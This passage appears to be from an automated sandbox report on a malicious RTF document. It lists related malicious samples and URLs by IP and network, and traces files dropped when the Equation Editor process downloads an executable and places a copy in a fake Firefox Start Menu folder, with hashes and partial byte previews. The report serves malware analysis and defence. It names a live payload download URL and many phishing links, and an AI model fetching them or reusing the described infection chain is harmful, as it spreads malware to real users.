                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            scnn7676766.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            price quote.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.145
                                                                                                                                                            t64.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            Preview_Annual.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.145

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            GOOGLEUSACCOUNT TEAM.pptGet hashmaliciousBrowse
                                                                                                                                                            • 172.217.168.1
                                                                                                                                                            purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                            • 34.102.136.180
                                                                                                                                                            inv.exeGet hashmaliciousBrowse
                                                                                                                                                            • 34.102.136.180
                                                                                                                                                            http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3DGet hashmaliciousBrowse
                                                                                                                                                            • 172.217.168.84
                                                                                                                                                            2020112395387_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 35.246.6.109
                                                                                                                                                            anthon.exeGet hashmaliciousBrowse
                                                                                                                                                            • 34.102.136.180
                                                                                                                                                            http://searchlf.comGet hashmaliciousBrowse
                                                                                                                                                            • 74.125.128.154
                                                                                                                                                            RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                            • 34.102.136.180
                                                                                                                                                            https://www.canva.com/design/DAEOhhihuRE/ilbmdiYYv4SZabsnRUeaIQ/view?utm_content=DAEOhhihuRE&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                                            • 74.125.128.157
                                                                                                                                                            https://www.canva.com/design/DAEOiuhLwDM/BOj9WYGqioxJf6uGii9b8Q/view?utm_content=DAEOiuhLwDM&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                                            • 172.217.168.34
                                                                                                                                                            https://docs.google.com/document/d/e/2PACX-1vTkklFHE_qZt5bggVyzSlPIJpfBM78UhR9h5giojoPSOo0J_kMb27pVCxF_eQESVaFWkRLwKQoIVpE-/pubGet hashmaliciousBrowse
                                                                                                                                                            • 74.125.128.155
                                                                                                                                                            https://docs.google.com/forms/d/e/1FAIpQLSfvVCUvByTC7wIMNQsuALuu8sCIp5hXEtWabaZn5DsGltbkEg/viewformGet hashmaliciousBrowse
                                                                                                                                                            • 216.58.215.225
                                                                                                                                                            https://docs.google.com/forms/d/e/1FAIpQLSfvVCUvByTC7wIMNQsuALuu8sCIp5hXEtWabaZn5DsGltbkEg/viewformGet hashmaliciousBrowse
                                                                                                                                                            • 172.217.168.34
                                                                                                                                                            https://Index.potentialissue.xyz/?e=fake@fake.comGet hashmaliciousBrowse
                                                                                                                                                            • 74.125.128.155
                                                                                                                                                            https://omgzone.co.uk/Get hashmaliciousBrowse
                                                                                                                                                            • 35.190.25.25
                                                                                                                                                            http://yjjv.midlidl.com/indexGet hashmaliciousBrowse
                                                                                                                                                            • 172.217.168.1
                                                                                                                                                            https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45Get hashmaliciousBrowse
                                                                                                                                                            • 35.244.142.80
                                                                                                                                                            ATT59829.htmGet hashmaliciousBrowse
                                                                                                                                                            • 216.58.215.225
                                                                                                                                                            Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 34.102.136.180
                                                                                                                                                            HOSTWINDSUShttp://email.balluun.com/ls/click?upn=KzNQqcw6vAwizrX-2Fig1Ls6Y5D9N6j9I5FZfBCN8B2wRxBmpXcbUQvKOFUzJGiw-2F3Qy64T8VZ2LXT8NNNJG9bemh7vjcLDgF5-2FXPBBBqdJ0-2BpvIlXlKrZECAirL9YySN2b1LT-2Bcy1l-2F0fp1Pwvv3I4j7XHHKagv-2FxlVdd85P38ZuA-2Bvv5JF3QaAOx19sqG0-2BnULpm_J-2BsRItFMcwpTA18DVdBlGBJyUhFuIaAEybVNgKjH795y-2Bjn2esAEGPPa76dl-2BxD62wo4xT0BtNrFdVu0eWgx-2F6eRqupI7yZWQAa-2FBr1dlsLgX0hlcDSdDmAHsaZaG3WUUyADLR7thqFcU32Djt0AEfQ9qS0428-2BH1u-2Fk1E3KVFo9IePxc9mOWOHzwBkFv-2FOdeNUShdwqtjGBw2zuSNSTyLDRcypBOMpUtPdiR8ihMQ0-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.173.52
                                                                                                                                                            http://email.balluun.com/ls/click?upn=vAgQonvqwvuwOYm-2FeLk6JoFNFg3eRlAI8QIEVntBAuI-2BvU3e7BCgAWK4gND5sUFzaOsmo7sSmVoKwCcIxTg-2BFixi2xkEEW0oX1nuZ00rbDRxhHyjyRDdAxKojA59O-2B4AFSpNTWqqEs1z6j5wzlR2-2FBqayO2J83qvH4QoQ-2F3anf0VFAroZ5d-2BXoNmQDglJ5pwxxVoZatBhZPngQRjuQTxew-3D-3DzH4L_3j-2BjdnCo31g6AoJOEEgYaF9xlWteAa1K0Qa8qq9OD9qW7sjFhUMmultTO5jBWtQpNUDwj6PE1qUa9-2BpzdXtC1dfajoy6E591rXly0ybZJZAn8Vxq-2Fq0s46eH6TVCm1b6N0WF6m2Ciw6XuwKQM6-2FvOhmnealyeWsQT6Pbejkt1oPtkbgT9bDnxj2sxfWzdY-2F9GQwHNqRuoi-2FmHeLH7KOkDQ-3D-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.204.104
                                                                                                                                                            MIC Taiwan RFQ.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.198.45
                                                                                                                                                            Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.119.68.17
                                                                                                                                                            41126780_Inv0ice_Confirmation.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.129.253.234
                                                                                                                                                            mFNIsJZPe2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.119.68.17
                                                                                                                                                            https://unilever-t.neolane.net/r/?id=he5e7463,33113b4d,33113b55&p1=t-op.xyz/birthday.html?e=am9obi5oZWlubGVpbkBhcm0uY29t%23&p2=&p3=qdxLRv1pgrLmAhpndPonbtt%2FU0Z7whiIJ9RHOsHSwuzr4xxs7s07CQ%3D%3DGet hashmaliciousBrowse
                                                                                                                                                            • 108.174.194.86
                                                                                                                                                            https://compliancetest-my.sharepoint.com/:b:/g/personal/breem_compliancetesting_com/Eea_DqHyOdpKgMecDkmEb-gBbrGjRA3g1tC-Cg8ccbaUzw?e=4%3aKZBmIk&at=9Get hashmaliciousBrowse
                                                                                                                                                            • 23.254.228.188
                                                                                                                                                            Payment09299.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.161.36
                                                                                                                                                            Hydraulex.exeGet hashmaliciousBrowse
                                                                                                                                                            • 23.254.244.17
                                                                                                                                                            Vidoe001mp4.scr signed FAT11 d.o.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.174.197.5
                                                                                                                                                            0frYk.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            unstr0000.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.249.173
                                                                                                                                                            0frYk.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            PO Price Confirmation.xls.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            PO Price Confirmation.xls.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.168.160.20
                                                                                                                                                            https://kumaritechnology.com/PVRREDIRECT/redirect/base64email/c2VjdXJpdHlpbnF1aXJpZXNAc2VhcnNoYy5jb20=Get hashmaliciousBrowse
                                                                                                                                                            • 104.168.243.132
                                                                                                                                                            JaxAdcBV3p.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.178.210
                                                                                                                                                            http://t.mail.sony-europe.com/r/?id=h3a020b08,361606a7,36416ae2&cid=DM66675&bid=973212424&src=eml&resp_id=79681940&ccid=1D2D1F298EDB0AB0239404EADAC9CD2613887304&p1=a-nz.xyz?TUqz0=ZGxva29zQHByb2xpc3QuY29t%23Get hashmaliciousBrowse
                                                                                                                                                            • 23.254.225.75
                                                                                                                                                            QUOTE #9201272.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.236.194.49
                                                                                                                                                            SQUARESPACEUSanthon.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            1Bn2brrsT7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            vOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            kayx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NEW PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            IE Cache URL:http://sea-shared-5.masterns.com/~vhlcnlog/ugopoundx/skypoundx.exe
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BFBB-6C9AC8D8FC42}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):15910
                                                                                                                                                            Entropy (8bit):3.6060056836164947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Lwr2OJ5BfZYoWdcLEH9+qkoN6HQKWfFoPNgsH0wgNOMkihDKK0SKGKVSR/rHa+:Lc20552/dcLEpkoN6kFolgsUwe8DAR/V
                                                                                                                                                            MD5:B7C7FDADBD941B2641EC39B77CE91005
                                                                                                                                                            SHA1:5DFAFC5DF67D6121306E2E86779856F5105492C4
                                                                                                                                                            SHA-256:7C7AFB0736B7523F61C112904F60ABC2A744BEE1BA82F9B65880AFC915BE0F07
                                                                                                                                                            SHA-512:216AD30F00C0638320EA6DBC72093D10135A0581ED4D1859EDD961D7A506A04418641ACA24AA09A18008FAA80710AC072623560C26FF42A6F32FC42758C37588
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ,.>.1.;.5.1.|.?...=.2.=.8.-.*.].?.8.3._.?.?.?...0.7.?.6.$._.~.#.,.`.|._.>.#.4.'...:.#.0...~.%.-.+.[./.?.`.-.].<.1.?.*.=.6.`.?.1.!.%._.9.%.%.~.?.,.%.?.:.'.:._._.3.&.%...].7.*.'...,.$.>...7...,.9.:.%.:.[.;...>.+.~.0.'.9.8.|.=.[.%...?.$...&...!.-.].3.'.@._.0.&.0.[.:.?.&.^.7.|.^.1.,.?.*.+...2.`.?.]...[.,.?.$.?.~.|._.#.?.].|.8.^.9.?.^.'.(.&.?.?.8.%.7.&.@.7.7.(.`.?.....|.?...>.%.7.=.+...@.8.9.?._.?.2.7.4.?.).%.'.1.+.]._.4.[./.?._.6.5.?.|.#...~.,...$.4.>.@.].-.1.-.2.+.).!....._.?.?.?.0.'.4.-...-.#.0.+.?.1.2.|.?.9.&.+...].7.:.!...1.%.].(.).^.%.1.(.@.`.&.%.?...-.<.%.0.?.6.*.].'./.6.'.).`.<.?.0...(.%.5.[.?...(.+.8.=.%.+.!.=.).7.1.<.4._.?.*.;.#.2.5.#.%.(.&.?.2...).:.0.`...9...'.?.8.2.6.^.%.%...4.?.7.5.%...8.!.3.|.:.2.,.:.0.*...^.%.:.$.|.&.@.?.|.&.'...8.*.5...9...?._.<.,.,.6._.=.9.!.:.+.'._.-.#.+...?.?.7.6.%.#._.'.-.=.?.0.].*.9.<.'.=.:.>.1.%.;.9.5.^.`.8.|.|.'.0.`.1...*.>.].%.?.2.[..._.*.@.@.....9.].%.:.3.8._.!.@.?.?.).;.#.1.?.%.?.@.0.1.>.2.'.:.1...:.$.6.*.?.,.0.?.|.4.?.2.~...3...?.&.3...^.#.4.^.>.
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1024
                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\VOMAXTRADING.LNK
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Nov 26 15:43:37 2020, length=1677719, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2048
                                                                                                                                                            Entropy (8bit):4.592219282555606
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8o/XT0jFzg+nK1SQh2o/XT0jFzg+nK1SQ/:8o/XojFklSQh2o/XojFklSQ/
                                                                                                                                                            MD5:EA51793AD3A560670A797369376A17A4
                                                                                                                                                            SHA1:226070D83E347F57849A2FD702A174CBF4CA34BB
                                                                                                                                                            SHA-256:839D28CDFA52ECC4260EAD6810BDED8DC2A4EA86D8884D68D7F140EBF56DCC1D
                                                                                                                                                            SHA-512:2ED194A371C117671B65D0B91DC52D8A9A2A0860C75410539CCD46F12ECB343D431CFC32FFE539C66089D567DB1C62EB01329EF3AA858B20902990BB6745718F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F.... ...[.v..{..[.v..{..b..I.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....zQs. .VOMAXT~1.DOC..N.......Q.y.Q.y*...8.....................V.O.M.A.X.T.R.A.D.I.N.G...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\965543\Users.user\Desktop\VOMAXTRADING.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.V.O.M.A.X.T.R.A.D.I.N.G...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965543..........D_....3N...W...9F.C...........[D_....3N...W
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):74
                                                                                                                                                            Entropy (8bit):4.441787744171977
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:M1//hs23orLhs23omX1//hs23ov:MRC23gG23nC23y
                                                                                                                                                            MD5:71298FC792A38B7B149B2B8EF01DBF34
                                                                                                                                                            SHA1:E25BCF5F84E6F9AD6C5075AA5A86FEB6B589414A
                                                                                                                                                            SHA-256:CC4CA7D8FE6495FD05F930393742B164F7C624CB7DE500142D92A244D20BA362
                                                                                                                                                            SHA-512:20C2D0BB9EF31EA23BBA7178E74C5C683BBA42C529CB04F6D7AD0FD54F0D0AFEEEEA8B2FB7AECB12A961DB70C44CD471F762E1CDC85084D5DC0C1895337A6730
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: [doc]..VOMAXTRADING.LNK=0..VOMAXTRADING.LNK=0..[doc]..VOMAXTRADING.LNK=0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.431160061181642
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\Desktop\~$MAXTRADING.doc
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.431160061181642
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Rich Text Format data, unknown version
                                                                                                                                                            Entropy (8bit):4.036944960469874
                                                                                                                                                            TrID:
                                                                                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                                                                                            File name:VOMAXTRADING.doc
                                                                                                                                                            File size:1677719
                                                                                                                                                            MD5:30244581b41accd77dab936571e0d87e
                                                                                                                                                            SHA1:46ddb3fa250dfb4808c3a43f7846d7c643a4f325
                                                                                                                                                            SHA256:2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
                                                                                                                                                            SHA512:485074c33256cd04b80f1f58297f5d26f55be56cd8837d35a825d8612407b310bfa29cde9e1934eec92da0a77b37f6e21f0ced9e3ce731ed8673c4b4da82f00e
                                                                                                                                                            SSDEEP:24576:8eqGjcemPSHjVfwQVPx830KDxaeb7uL4RUYspUNt9DzSae7TTyCACNy9r9JK3E3t:W
                                                                                                                                                            File Content Preview:{\rtf95781,>1;51|?.=2=8-*]?83_???.07?6$_~#,`|_>#4'.:#0.~%-+[/?`-]<1?*=6`?1!%_9%%~?,%?:':__3&%.]7*'.,$>.7.,9:%:[;.>+~0'98|=[%.?$.&.!-]3'@_0&0[:?&^7|^1,?*+.2`?].[,?$?~|_#?]|8^9?^'(&??8%7&@77(`?..|?.>%7=+.@89?_?274?)%'1+]_4[/?_65?|#.~,.$4>@]-1-2+)!.._???0'4-

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:e4eea2aaa4b4b4a4

